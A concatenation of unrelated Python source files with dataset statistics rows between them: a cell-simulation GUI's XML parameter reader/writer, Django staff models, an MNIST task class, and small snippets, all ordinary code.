self.float89.value = float(uep.find('.//cell_definition[4]//phenotype//motility//migration_bias').text)
self.bool9.value = ('true' == (uep.find('.//cell_definition[4]//phenotype//motility//options//enabled').text.lower()))
self.bool10.value = ('true' == (uep.find('.//cell_definition[4]//phenotype//motility//options//use_2D').text.lower()))
self.bool11.value = ('true' == (uep.find('.//cell_definition[4]//phenotype//motility//options//chemotaxis//enabled').text.lower()))
self.chemotaxis_substrate4.value = uep.find('.//cell_definition[4]//phenotype//motility//options//chemotaxis//substrate').text
self.chemotaxis_direction4.value = uep.find('.//cell_definition[4]//phenotype//motility//options//chemotaxis//direction').text
# --------- volume
self.float90.value = float(uep.find('.//cell_definition[4]//phenotype//volume//total').text)
self.float91.value = float(uep.find('.//cell_definition[4]//phenotype//volume//nuclear').text)
# --------- secretion
self.text7.value = uep.find('.//cell_definition[4]//phenotype//secretion//substrate[1]').attrib['name']
self.float92.value = float(uep.find('.//cell_definition[4]//phenotype//secretion//substrate[1]//uptake_rate').text)
# --------- intracellular
self.bnd_filenames[3].value = uep.find('.//cell_definition[4]//phenotype//intracellular//bnd_filename').text
self.cfg_filenames[3].value = uep.find('.//cell_definition[4]//phenotype//intracellular//cfg_filename').text
self.float93.value = float(uep.find('.//cell_definition[4]//phenotype//intracellular//time_step').text)
# ------------------ cell_definition: macrophage
# --------- death
self.float96.value = float(uep.find('.//cell_definition[5]//phenotype//death//model[1]//death_rate').text)
# --------- motility
self.float97.value = float(uep.find('.//cell_definition[5]//phenotype//motility//migration_bias').text)
self.float98.value = float(uep.find('.//cell_definition[5]//phenotype//motility//persistence_time').text)
self.bool12.value = ('true' == (uep.find('.//cell_definition[5]//phenotype//motility//options//enabled').text.lower()))
self.bool13.value = ('true' == (uep.find('.//cell_definition[5]//phenotype//motility//options//use_2D').text.lower()))
self.bool14.value = ('true' == (uep.find('.//cell_definition[5]//phenotype//motility//options//chemotaxis//enabled').text.lower()))
self.chemotaxis_substrate5.value = uep.find('.//cell_definition[5]//phenotype//motility//options//chemotaxis//substrate').text
self.chemotaxis_direction5.value = uep.find('.//cell_definition[5]//phenotype//motility//options//chemotaxis//direction').text
# --------- volume
self.float99.value = float(uep.find('.//cell_definition[5]//phenotype//volume//total').text)
self.float100.value = float(uep.find('.//cell_definition[5]//phenotype//volume//nuclear').text)
self.float101.value = float(uep.find('.//cell_definition[5]//phenotype//volume//cytoplasmic_biomass_change_rate').text)
# --------- intracellular
self.bnd_filenames[4].value = uep.find('.//cell_definition[5]//phenotype//intracellular//bnd_filename').text
self.cfg_filenames[4].value = uep.find('.//cell_definition[5]//phenotype//intracellular//cfg_filename').text
self.float102.value = float(uep.find('.//cell_definition[5]//phenotype//intracellular//time_step').text)
# ------------------ cell_definition: neutrophil
# --------- death
self.float108.value = float(uep.find('.//cell_definition[6]//phenotype//death//model[1]//death_rate').text)
# --------- motility
self.float109.value = float(uep.find('.//cell_definition[6]//phenotype//motility//speed').text)
self.float110.value = float(uep.find('.//cell_definition[6]//phenotype//motility//migration_bias').text)
self.float111.value = float(uep.find('.//cell_definition[6]//phenotype//motility//persistence_time').text)
self.bool15.value = ('true' == (uep.find('.//cell_definition[6]//phenotype//motility//options//enabled').text.lower()))
self.bool16.value = ('true' == (uep.find('.//cell_definition[6]//phenotype//motility//options//use_2D').text.lower()))
self.bool17.value = ('true' == (uep.find('.//cell_definition[6]//phenotype//motility//options//chemotaxis//enabled').text.lower()))
self.chemotaxis_substrate6.value = uep.find('.//cell_definition[6]//phenotype//motility//options//chemotaxis//substrate').text
self.chemotaxis_direction6.value = uep.find('.//cell_definition[6]//phenotype//motility//options//chemotaxis//direction').text
# --------- secretion
self.text8.value = uep.find('.//cell_definition[6]//phenotype//secretion//substrate[1]').attrib['name']
self.float112.value = float(uep.find('.//cell_definition[6]//phenotype//secretion//substrate[1]//uptake_rate').text)
# --------- volume
self.float113.value = float(uep.find('.//cell_definition[6]//phenotype//volume//total').text)
self.float114.value = float(uep.find('.//cell_definition[6]//phenotype//volume//nuclear').text)
self.float115.value = float(uep.find('.//cell_definition[6]//phenotype//volume//cytoplasmic_biomass_change_rate').text)
# --------- intracellular
self.bnd_filenames[5].value = uep.find('.//cell_definition[6]//phenotype//intracellular//bnd_filename').text
self.cfg_filenames[5].value = uep.find('.//cell_definition[6]//phenotype//intracellular//cfg_filename').text
self.float116.value = float(uep.find('.//cell_definition[6]//phenotype//intracellular//time_step').text)
# Read values from the GUI widgets to enable editing XML
def fill_xml(self, xml_root):
uep = xml_root.find('.//cell_definitions') # find unique entry point
# ------------------ cell_definition: default
# --------- cycle (flow_cytometry_separated_cycle_model)
uep.find('.//cell_definition[1]//phenotype//cycle//phase_transition_rates//rate[1]').text = str(self.float0.value)
uep.find('.//cell_definition[1]//phenotype//cycle//phase_transition_rates//rate[2]').text = str(self.float1.value)
uep.find('.//cell_definition[1]//phenotype//cycle//phase_transition_rates//rate[3]').text = str(self.float2.value)
uep.find('.//cell_definition[1]//phenotype//cycle//phase_transition_rates//rate[4]').text = str(self.float3.value)
# --------- death
uep.find('.//cell_definition[1]//phenotype//death//model[1]//death_rate').text = str(self.float4.value)
uep.find('.//cell_definition[1]//phenotype//death//model[1]//parameters//unlysed_fluid_change_rate').text = str(self.float5.value)
uep.find('.//cell_definition[1]//phenotype//death//model[1]//parameters//lysed_fluid_change_rate').text = str(self.float6.value)
uep.find('.//cell_definition[1]//phenotype//death//model[1]//parameters//cytoplasmic_biomass_change_rate').text = str(self.float7.value)
uep.find('.//cell_definition[1]//phenotype//death//model[1]//parameters//nuclear_biomass_change_rate').text = str(self.float8.value)
uep.find('.//cell_definition[1]//phenotype//death//model[1]//parameters//calcification_rate').text = str(self.float9.value)
uep.find('.//cell_definition[1]//phenotype//death//model[1]//parameters//relative_rupture_volume').text = str(self.float10.value)
uep.find('.//cell_definition[1]//phenotype//death//model[2]//death_rate').text = str(self.float11.value)
uep.find('.//cell_definition[1]//phenotype//death//model[2]//parameters//unlysed_fluid_change_rate').text = str(self.float12.value)
uep.find('.//cell_definition[1]//phenotype//death//model[2]//parameters//lysed_fluid_change_rate').text = str(self.float13.value)
uep.find('.//cell_definition[1]//phenotype//death//model[2]//parameters//cytoplasmic_biomass_change_rate').text = str(self.float14.value)
uep.find('.//cell_definition[1]//phenotype//death//model[2]//parameters//nuclear_biomass_change_rate').text = str(self.float15.value)
uep.find('.//cell_definition[1]//phenotype//death//model[2]//parameters//calcification_rate').text = str(self.float16.value)
uep.find('.//cell_definition[1]//phenotype//death//model[2]//parameters//relative_rupture_volume').text = str(self.float17.value)
# --------- volume
uep.find('.//cell_definition[1]//phenotype//volume//total').text = str(self.float18.value)
uep.find('.//cell_definition[1]//phenotype//volume//fluid_fraction').text = str(self.float19.value)
uep.find('.//cell_definition[1]//phenotype//volume//nuclear').text = str(self.float20.value)
uep.find('.//cell_definition[1]//phenotype//volume//fluid_change_rate').text = str(self.float21.value)
uep.find('.//cell_definition[1]//phenotype//volume//cytoplasmic_biomass_change_rate').text = str(self.float22.value)
uep.find('.//cell_definition[1]//phenotype//volume//nuclear_biomass_change_rate').text = str(self.float23.value)
uep.find('.//cell_definition[1]//phenotype//volume//calcified_fraction').text = str(self.float24.value)
uep.find('.//cell_definition[1]//phenotype//volume//calcification_rate').text = str(self.float25.value)
uep.find('.//cell_definition[1]//phenotype//volume//relative_rupture_volume').text = str(self.float26.value)
# --------- mechanics
uep.find('.//cell_definition[1]//phenotype//mechanics//cell_cell_adhesion_strength').text = str(self.float27.value)
uep.find('.//cell_definition[1]//phenotype//mechanics//cell_cell_repulsion_strength').text = str(self.float28.value)
uep.find('.//cell_definition[1]//phenotype//mechanics//relative_maximum_adhesion_distance').text = str(self.float29.value)
uep.find('.//cell_definition[1]//phenotype//mechanics//options//set_relative_equilibrium_distance').attrib['enabled'] = str(self.bool0.value)
uep.find('.//cell_definition[1]//phenotype//mechanics//options//set_absolute_equilibrium_distance').attrib['enabled'] = str(self.bool1.value)
# --------- motility
uep.find('.//cell_definition[1]//phenotype//motility//speed').text = str(self.float32.value)
uep.find('.//cell_definition[1]//phenotype//motility//persistence_time').text = str(self.float33.value)
uep.find('.//cell_definition[1]//phenotype//motility//migration_bias').text = str(self.float34.value)
uep.find('.//cell_definition[1]//phenotype//motility//options//enabled').text = str(self.bool2.value)
uep.find('.//cell_definition[1]//phenotype//motility//options//use_2D').text = str(self.bool3.value)
uep.find('.//cell_definition[1]//phenotype//motility//options//chemotaxis//enabled').text = str(self.bool4.value)
uep.find('.//cell_definition[1]//phenotype//motility//options//chemotaxis//substrate').text = str(self.chemotaxis_substrate1.value)
uep.find('.//cell_definition[1]//phenotype//motility//options//chemotaxis//direction').text = str(self.chemotaxis_direction1.value)
# --------- secretion
uep.find('.//cell_definition[1]//phenotype//secretion//substrate[1]').attrib['name'] = str(self.text0.value)
uep.find('.//cell_definition[1]//phenotype//secretion//substrate[1]//secretion_target').text = str(self.float35.value)
uep.find('.//cell_definition[1]//phenotype//secretion//substrate[2]').attrib['name'] = str(self.text1.value)
uep.find('.//cell_definition[1]//phenotype//secretion//substrate[2]//secretion_target').text = str(self.float36.value)
uep.find('.//cell_definition[1]//phenotype//secretion//substrate[3]').attrib['name'] = str(self.text2.value)
uep.find('.//cell_definition[1]//phenotype//secretion//substrate[3]//secretion_target').text = str(self.float37.value)
uep.find('.//cell_definition[1]//phenotype//secretion//substrate[4]').attrib['name'] = str(self.text3.value)
uep.find('.//cell_definition[1]//phenotype//secretion//substrate[4]//secretion_target').text = str(self.float38.value)
# --------- molecular
# ------------------ cell_definition: lung epithelium
# --------- death
uep.find('.//cell_definition[2]//phenotype//death//model[1]//death_rate').text = str(self.float77.value)
# --------- motility
uep.find('.//cell_definition[2]//phenotype//motility//options//enabled').text = str(self.bool5.value)
# --------- secretion
# --------- intracellular
uep.find('.//cell_definition[2]//phenotype//intracellular//bnd_filename').text = str(self.bnd_filenames[1].value)
uep.find('.//cell_definition[2]//phenotype//intracellular//cfg_filename').text = str(self.cfg_filenames[1].value)
uep.find('.//cell_definition[2]//phenotype//intracellular//time_step').text = str(self.float78.value)
# ------------------ cell_definition: immune
# --------- mechanics
uep.find('.//cell_definition[3]//phenotype//mechanics//cell_cell_adhesion_strength').text = str(self.float79.value)
uep.find('.//cell_definition[3]//phenotype//mechanics//cell_cell_repulsion_strength').text = str(self.float80.value)
# --------- death
uep.find('.//cell_definition[3]//phenotype//death//model[1]//death_rate').text = str(self.float81.value)
# --------- motility
uep.find('.//cell_definition[3]//phenotype//motility//speed').text = str(self.float82.value)
uep.find('.//cell_definition[3]//phenotype//motility//persistence_time').text = str(self.float83.value)
uep.find('.//cell_definition[3]//phenotype//motility//migration_bias').text = str(self.float84.value)
uep.find('.//cell_definition[3]//phenotype//motility//options//enabled').text = str(self.bool6.value)
uep.find('.//cell_definition[3]//phenotype//motility//options//use_2D').text = str(self.bool7.value)
uep.find('.//cell_definition[3]//phenotype//motility//options//chemotaxis//enabled').text = str(self.bool8.value)
uep.find('.//cell_definition[3]//phenotype//motility//options//chemotaxis//substrate').text = str(self.chemotaxis_substrate3.value)
uep.find('.//cell_definition[3]//phenotype//motility//options//chemotaxis//direction').text = str(self.chemotaxis_direction3.value)
# --------- secretion
uep.find('.//cell_definition[3]//phenotype//secretion//substrate[1]').attrib['name'] = str(self.text4.value)
uep.find('.//cell_definition[3]//phenotype//secretion//substrate[1]//uptake_rate').text = str(self.float85.value)
uep.find('.//cell_definition[3]//phenotype//secretion//substrate[2]').attrib['name'] = str(self.text5.value)
uep.find('.//cell_definition[3]//phenotype//secretion//substrate[2]//uptake_rate').text = str(self.float86.value)
uep.find('.//cell_definition[3]//phenotype//secretion//substrate[3]').attrib['name'] = str(self.text6.value)
uep.find('.//cell_definition[3]//phenotype//secretion//substrate[3]//uptake_rate').text = str(self.float87.value)
# ------------------ cell_definition: CD8 Tcell
# --------- death
uep.find('.//cell_definition[4]//phenotype//death//model[1]//death_rate').text = str(self.float88.value)
# --------- motility
uep.find('.//cell_definition[4]//phenotype//motility//migration_bias').text = str(self.float89.value)
uep.find('.//cell_definition[4]//phenotype//motility//options//enabled').text = str(self.bool9.value)
uep.find('.//cell_definition[4]//phenotype//motility//options//use_2D').text = str(self.bool10.value)
uep.find('.//cell_definition[4]//phenotype//motility//options//chemotaxis//enabled').text = str(self.bool11.value)
uep.find('.//cell_definition[4]//phenotype//motility//options//chemotaxis//substrate').text = str(self.chemotaxis_substrate4.value)
uep.find('.//cell_definition[4]//phenotype//motility//options//chemotaxis//direction').text = str(self.chemotaxis_direction4.value)
# --------- volume
uep.find('.//cell_definition[4]//phenotype//volume//total').text = str(self.float90.value)
uep.find('.//cell_definition[4]//phenotype//volume//nuclear').text = str(self.float91.value)
# --------- secretion
uep.find('.//cell_definition[4]//phenotype//secretion//substrate[1]').attrib['name'] = str(self.text7.value)
uep.find('.//cell_definition[4]//phenotype//secretion//substrate[1]//uptake_rate').text = str(self.float92.value)
# --------- intracellular
uep.find('.//cell_definition[4]//phenotype//intracellular//bnd_filename').text = str(self.bnd_filenames[3].value)
uep.find('.//cell_definition[4]//phenotype//intracellular//cfg_filename').text = str(self.cfg_filenames[3].value)
uep.find('.//cell_definition[4]//phenotype//intracellular//time_step').text = str(self.float93.value)
# ------------------ cell_definition: macrophage
# --------- death
uep.find('.//cell_definition[5]//phenotype//death//model[1]//death_rate').text = str(self.float96.value)
# --------- motility
uep.find('.//cell_definition[5]//phenotype//motility//migration_bias').text = str(self.float97.value)
uep.find('.//cell_definition[5]//phenotype//motility//persistence_time').text = str(self.float98.value)
uep.find('.//cell_definition[5]//phenotype//motility//options//enabled').text = str(self.bool12.value)
uep.find('.//cell_definition[5]//phenotype//motility//options//use_2D').text = str(self.bool13.value)
uep.find('.//cell_definition[5]//phenotype//motility//options//chemotaxis//enabled').text = str(self.bool14.value)
uep.find('.//cell_definition[5]//phenotype//motility//options//chemotaxis//substrate').text = str(self.chemotaxis_substrate5.value)
uep.find('.//cell_definition[5]//phenotype//motility//options//chemotaxis//direction').text = str(self.chemotaxis_direction5.value)
# --------- volume
uep.find('.//cell_definition[5]//phenotype//volume//total').text = str(self.float99.value)
uep.find('.//cell_definition[5]//phenotype//volume//nuclear').text = str(self.float100.value)
uep.find('.//cell_definition[5]//phenotype//volume//cytoplasmic_biomass_change_rate').text = str(self.float101.value)
# --------- intracellular
uep.find('.//cell_definition[5]//phenotype//intracellular//bnd_filename').text = str(self.bnd_filenames[4].value)
uep.find('.//cell_definition[5]//phenotype//intracellular//cfg_filename').text = str(self.cfg_filenames[4].value)
uep.find('.//cell_definition[5]//phenotype//intracellular//time_step').text = str(self.float102.value)
# ------------------ cell_definition: neutrophil
# --------- death
uep.find('.//cell_definition[6]//phenotype//death//model[1]//death_rate').text = str(self.float108.value)
# --------- motility
uep.find('.//cell_definition[6]//phenotype//motility//speed').text = str(self.float109.value)
uep.find('.//cell_definition[6]//phenotype//motility//migration_bias').text = str(self.float110.value)
uep.find('.//cell_definition[6]//phenotype//motility//persistence_time').text = str(self.float111.value)
uep.find('.//cell_definition[6]//phenotype//motility//options//enabled').text = str(self.bool15.value)
uep.find('.//cell_definition[6]//phenotype//motility//options//use_2D').text = str(self.bool16.value)
uep.find('.//cell_definition[6]//phenotype//motility//options//chemotaxis//enabled').text = str(self.bool17.value)
uep.find('.//cell_definition[6]//phenotype//motility//options//chemotaxis//substrate').text = str(self.chemotaxis_substrate6.value)
uep.find('.//cell_definition[6]//phenotype//motility//options//chemotaxis//direction').text = str(self.chemotaxis_direction6.value)
# --------- secretion
uep.find('.//cell_definition[6]//phenotype//secretion//substrate[1]').attrib['name'] = str(self.text8.value)
uep.find('.//cell_definition[6]//phenotype//secretion//substrate[1]//uptake_rate').text = str(self.float112.value)
# --------- volume
uep.find('.//cell_definition[6]//phenotype//volume//total').text = str(self.float113.value)
uep.find('.//cell_definition[6]//phenotype//volume//nuclear').text = str(self.float114.value)
uep.find('.//cell_definition[6]//phenotype//volume//cytoplasmic_biomass_change_rate').text = str(self.float115.value)
# --------- intracellular
uep.find('.//cell_definition[6]//phenotype//intracellular//bnd_filename').text = str(self.bnd_filenames[5].value)
uep.find('.//cell_definition[6]//phenotype//intracellular//cfg_filename').text = str(self.cfg_filenames[5].value)
uep.find('.//cell_definition[6]//phenotype//intracellular//time_step').text = str(self.float116.value)
| 68.581828 | 471 | 0.686088 | 15,915 | 129,071 | 5.341313 | 0.04656 | 0.063054 | 0.0775 | 0.070182 | 0.859212 | 0.853212 | 0.844248 | 0.829626 | 0.814862 | 0.790641 | 0 | 0.028274 | 0.165614 | 129,071 | 1,881 | 472 | 68.618288 | 0.761057 | 0.036801 | 0 | 0.385256 | 1 | 0 | 0.210575 | 0.137187 | 0 | 0 | 0 | 0 | 0 | 1 | 0.003205 | false | 0 | 0.001282 | 0 | 0.005128 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
aab270916feaa8e6762dc89872b82e555985c062 | 37 | py | Python | jaseci_kit/jaseci_kit/t5_sum.py | ypkang/jaseci-1 | 8447b78bd788dbeb136fa818182f3028750f6130 | [
"MIT"
] | 6 | 2021-10-30T03:35:36.000Z | 2022-02-10T02:06:18.000Z | jaseci_kit/jaseci_kit/t5_sum.py | ypkang/jaseci-1 | 8447b78bd788dbeb136fa818182f3028750f6130 | [
"MIT"
] | 85 | 2021-10-29T22:47:39.000Z | 2022-03-31T06:11:52.000Z | jaseci_kit/jaseci_kit/t5_sum.py | ypkang/jaseci-1 | 8447b78bd788dbeb136fa818182f3028750f6130 | [
"MIT"
] | 12 | 2021-11-03T17:29:22.000Z | 2022-03-30T16:01:53.000Z | from .modules.t5_sum.t5_sum import *
| 18.5 | 36 | 0.783784 | 7 | 37 | 3.857143 | 0.714286 | 0.37037 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.060606 | 0.108108 | 37 | 1 | 37 | 37 | 0.757576 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
2aefb166a4dff2b78a2dbd4ffde206331f90bd9a | 7,174 | py | Python | staff/models.py | Boydlloyd/empmgt | de2af88e5f26f4c998fde991e5379a44333f0121 | [
"MIT"
] | null | null | null | staff/models.py | Boydlloyd/empmgt | de2af88e5f26f4c998fde991e5379a44333f0121 | [
"MIT"
] | null | null | null | staff/models.py | Boydlloyd/empmgt | de2af88e5f26f4c998fde991e5379a44333f0121 | [
"MIT"
] | null | null | null | from django.db import models
from django.contrib.auth.models import User,Group
from school.models import District,Province,School
import datetime
class Staffmodule(models.Model):
datecreated= models.DateTimeField(auto_now_add=True)
class Myprofile(models.Model):
datecreated= models.DateTimeField(auto_now_add=True)
def current_date_time():
current = datetime.datetime.now()
newcurrent = str(current)
mydate=newcurrent[0:19]
return mydate
class Userlevel(models.Model):
user = models.ForeignKey(User,on_delete=models.DO_NOTHING)
userpic=models.ImageField("User Photo",upload_to='profile',default="profile/profile.jpg")
staff = models.IntegerField(default=0)
level= models.IntegerField()
description = models.CharField("Description",null=True,max_length=30)
def __str__(self):
return str(self.user)+"_Level "+str(self.level)
class Position(models.Model):
position = models.CharField("Staff Position",max_length=30,unique=True)
datecreated= models.DateTimeField(auto_now_add=True)
author = models.ForeignKey(User,on_delete=models.DO_NOTHING)
def __str__(self):
return self.position
class Title(models.Model):
title = models.CharField("Staff Title",max_length=30,unique=True)
datecreated= models.DateTimeField(auto_now_add=True)
author = models.ForeignKey(User,on_delete=models.DO_NOTHING)
def __str__(self):
return self.title
class Staff(models.Model):
GENDER = (('M', 'Male'),('F', 'Female'))
STATUS = (('Registered', 'Registered'),('Pending', 'Pending'),('Updated', 'Updated'),('Approved', 'Approved'),('Disapproved', 'Disapproved'))
tsnumber = models.CharField("TS Number",unique=True,null=True,max_length=8)
fname = models.CharField("First Name",max_length=20)
lname = models.CharField("Last Name",max_length=20)
mname = models.CharField("Middle Name",max_length=20,blank=True)
email = models.EmailField("Email",null=True,unique=True)
gender = models.CharField("Gender",choices=GENDER,max_length=1)
status = models.CharField("STATUS",choices=STATUS,max_length=11,default="Registered")
isconfirmed = models.BooleanField(default=False)
empnumber = models.CharField("Employee No.",unique=True,null=True,max_length=8)
mobile=models.CharField("Contact No.", max_length=20,blank=True,null=True,unique=True)
nrc = models.CharField("NRC",max_length=11,null=True)
birth_date = models.DateField("Date of Birth", auto_now=False, null=True)
first_appointment = models.DateField("Date of First Appointment", auto_now=False, null=True)
title = models.ForeignKey(Title,null=True,on_delete=models.SET_NULL)
position = models.ForeignKey(Position,null=True,on_delete=models.SET_NULL)
school = models.ForeignKey(School,null=True,on_delete=models.SET_NULL)
district = models.ForeignKey(District,null=True,on_delete=models.SET_NULL)
province = models.ForeignKey(Province,null=True,on_delete=models.SET_NULL)
datecreated= models.DateTimeField(auto_now_add=True)
author = models.ForeignKey(User,on_delete=models.DO_NOTHING)
search = models.CharField("Search",max_length=200,null=True)
comment = models.CharField("Comment",max_length=200,default=" ")
export_to_file=models.BooleanField(default=False)
qualifications = models.IntegerField(default=0)
profilepic=models.ImageField("Staff Photo",upload_to='profile',default="profile/profile.jpg")
is_updated=models.BooleanField(default=False)
is_active=models.BooleanField(default=False)
def __str__(self):
return self.fname +" "+self.lname+"_"+str(self.empnumber)
class Districtstaff(models.Model):
GENDER = [['M', 'Male'],['F', 'Female']]
STATUS = (('Registred', 'Registered'),('Updated', 'Updated'))
fname = models.CharField("First Name",max_length=20)
lname = models.CharField("Last Name",max_length=20)
mname = models.CharField("Middle Name",max_length=20,blank=True)
gender = models.CharField("Gender",choices=GENDER,max_length=1,null=True)
isconfirmed = models.BooleanField(default=False)
empnumber = models.CharField("Employee No.",unique=True,null=True,max_length=8)
email = models.EmailField("Email",null=True,unique=True)
mobile=models.CharField("Contact No.", max_length=20,blank=True,null=True,unique=True)
nrc = models.CharField("NRC",max_length=11,null=True)
birth_date = models.DateField("Date of Birth", auto_now=False, null=True)
first_appointment = models.DateField("Date of First Appointment", auto_now=False, null=True)
title = models.ForeignKey(Title,null=True,on_delete=models.SET_NULL)
position = models.ForeignKey(Position,null=True,on_delete=models.SET_NULL)
district = models.ForeignKey(District,on_delete=models.DO_NOTHING)
province = models.ForeignKey(Province,on_delete=models.DO_NOTHING)
datecreated= models.DateTimeField(auto_now_add=True)
status = models.CharField("STATUS",choices=STATUS,max_length=11,default="Registered")
author = models.ForeignKey(User,on_delete=models.DO_NOTHING)
search = models.CharField("Search",max_length=200,null=True)
export_to_file=models.BooleanField(default=False)
is_updated=models.BooleanField(default=False)
profilepic=models.ImageField("Staff Photo",upload_to='profile',default="profile/profile.jpg")
def __str__(self):
return self.fname +" "+self.lname+"_"+str(self.empnumber)
class Provincialstaff(models.Model):
GENDER = (('M', 'Male'),('F', 'Female'))
STATUS = (('Registred', 'Registered'),('Updated', 'Updated'))
fname = models.CharField("First Name",max_length=20)
lname = models.CharField("Last Name",max_length=20)
mname = models.CharField("Middle Name",max_length=20,blank=True)
gender = models.CharField("Gender",choices=GENDER,max_length=1,null=True)
isconfirmed = models.BooleanField(default=False)
empnumber = models.CharField("Employee No.",unique=True,null=True,max_length=15)
email = models.EmailField("Email",null=True,unique=True)
mobile=models.CharField("Contact No.", max_length=20,blank=True,null=True,unique=True)
nrc = models.CharField("NRC",max_length=11,null=True)
birth_date = models.DateField("Date of Birth", auto_now=False, null=True)
first_appointment = models.DateField("Date of First Appointment", auto_now=False, null=True)
title = models.ForeignKey(Title,null=True,on_delete=models.SET_NULL)
position = models.ForeignKey(Position,null=True,on_delete=models.SET_NULL)
province = models.ForeignKey(Province,on_delete=models.DO_NOTHING)
datecreated= models.DateTimeField(auto_now_add=True)
status = models.CharField("STATUS",choices=STATUS,max_length=11,default="Registered")
author = models.ForeignKey(User,on_delete=models.DO_NOTHING)
search = models.CharField("Search",max_length=200,null=True)
export_to_file=models.BooleanField(default=False)
is_updated=models.BooleanField(default=False)
profilepic=models.ImageField("Staff Photo",upload_to='profile',default="profile/profile.jpg")
def __str__(self):
return self.fname +" "+self.lname+"_"+str(self.empnumber)
| 51.985507 | 145 | 0.740591 | 935 | 7,174 | 5.534759 | 0.125134 | 0.05256 | 0.048696 | 0.057971 | 0.827633 | 0.822802 | 0.815266 | 0.796135 | 0.764831 | 0.743575 | 0 | 0.010605 | 0.11932 | 7,174 | 137 | 146 | 52.364964 | 0.808484 | 0 | 0 | 0.669492 | 0 | 0 | 0.10902 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.059322 | false | 0 | 0.033898 | 0.050847 | 0.974576 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
2d96701a84b00ea1861bc2ac8beddac02fc332d6 | 92 | py | Python | tests/strings/join.py | Slater-Victoroff/pyjaco | 89c4e3c46399c5023b0e160005d855a01241c58a | [
"MIT"
] | 50 | 2015-03-24T19:45:34.000Z | 2022-02-20T04:34:26.000Z | tests/strings/join.py | MoonStarCZW/py2js | 6cda2b1d3cf281a5ca92c18b08ac9fa1c389cbea | [
"MIT"
] | 2 | 2017-02-26T09:43:07.000Z | 2017-03-06T20:04:24.000Z | tests/strings/join.py | Slater-Victoroff/pyjaco | 89c4e3c46399c5023b0e160005d855a01241c58a | [
"MIT"
] | 11 | 2016-03-29T06:17:07.000Z | 2021-12-11T12:57:41.000Z | a = ["a", "b", "c"]
print "".join(a)
print " ".join(a)
print "x".join(a)
print "x ".join(a)
| 15.333333 | 19 | 0.5 | 18 | 92 | 2.555556 | 0.333333 | 0.434783 | 0.652174 | 0.652174 | 0.586957 | 0.586957 | 0 | 0 | 0 | 0 | 0 | 0 | 0.163043 | 92 | 5 | 20 | 18.4 | 0.597403 | 0 | 0 | 0.8 | 0 | 0 | 0.076087 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.8 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 8 |
2dbf97af5113bb46f79a8427aa95e9774d1c3797 | 8,663 | py | Python | tasks/mnist.py | samiraabnar/DistillingInductiveBias | 962f87e7d38a3d255846432286e048d176ed7a5d | [
"MIT"
] | 10 | 2020-07-04T09:11:36.000Z | 2021-12-16T13:06:35.000Z | tasks/mnist.py | samiraabnar/DistillingInductiveBias | 962f87e7d38a3d255846432286e048d176ed7a5d | [
"MIT"
] | null | null | null | tasks/mnist.py | samiraabnar/DistillingInductiveBias | 962f87e7d38a3d255846432286e048d176ed7a5d | [
"MIT"
] | 3 | 2021-07-09T16:24:07.000Z | 2022-02-07T15:49:05.000Z | from distill.distill_util import DistillLoss, get_probs
from tasks.task import Task
import tensorflow as tf
import tensorflow_datasets as tfds
from tf2_models.metrics import ClassificationLoss
from tfds_data.aff_nist import AffNist
class Mnist(Task):
def __init__(self, task_params, name='mnist', data_dir='mnist_data'):
self.databuilder = tfds.builder("mnist")
super(Mnist, self).__init__(task_params=task_params, name=name,
data_dir=data_dir,
builder_cls=None)
def vocab_size(self):
return 28*28
def output_size(self):
return 10
def get_loss_fn(self):
return ClassificationLoss(global_batch_size=self.task_params.batch_size,
padding_symbol=tf.constant(-1, dtype=tf.int64))
def get_distill_loss_fn(self, distill_params):
return DistillLoss(tmp=distill_params.distill_temp)
def get_probs_fn(self):
return get_probs
def metrics(self):
return [ClassificationLoss(global_batch_size=self.task_params.batch_size,
padding_symbol=tf.constant(-1, dtype=tf.int64)),
tf.keras.metrics.SparseCategoricalAccuracy()]
@property
def padded_shapes(self):
# To make sure we are not using this!
raise NotImplementedError
def convert_examples(self, examples):
return tf.cast(examples['image'], dtype=tf.float32)/255, tf.cast(examples['label'], dtype=tf.int32)
def setup_datasets(self):
self.info = self.databuilder.info
self.n_train_batches = int(
self.info.splits['train'].num_examples / self.task_params.batch_size)
self.n_test_batches = int(
self.info.splits['test'].num_examples / self.task_params.batch_size)
self.n_valid_batches = int(
self.info.splits['test'].num_examples / self.task_params.batch_size)
self.databuilder.download_and_prepare(download_dir=self.data_dir)
self.test_dataset = self.databuilder.as_dataset(split="test")
assert isinstance(self.test_dataset, tf.data.Dataset)
self.test_dataset = self.test_dataset.map(map_func=lambda x: self.convert_examples(x),
num_parallel_calls=tf.data.experimental.AUTOTUNE)
self.test_dataset = self.test_dataset.repeat()
self.test_dataset = self.test_dataset.batch(
batch_size=self.task_params.batch_size)
self.test_dataset = self.test_dataset.prefetch(
tf.data.experimental.AUTOTUNE)
self.train_dataset = self.databuilder.as_dataset(split="train")
assert isinstance(self.train_dataset, tf.data.Dataset)
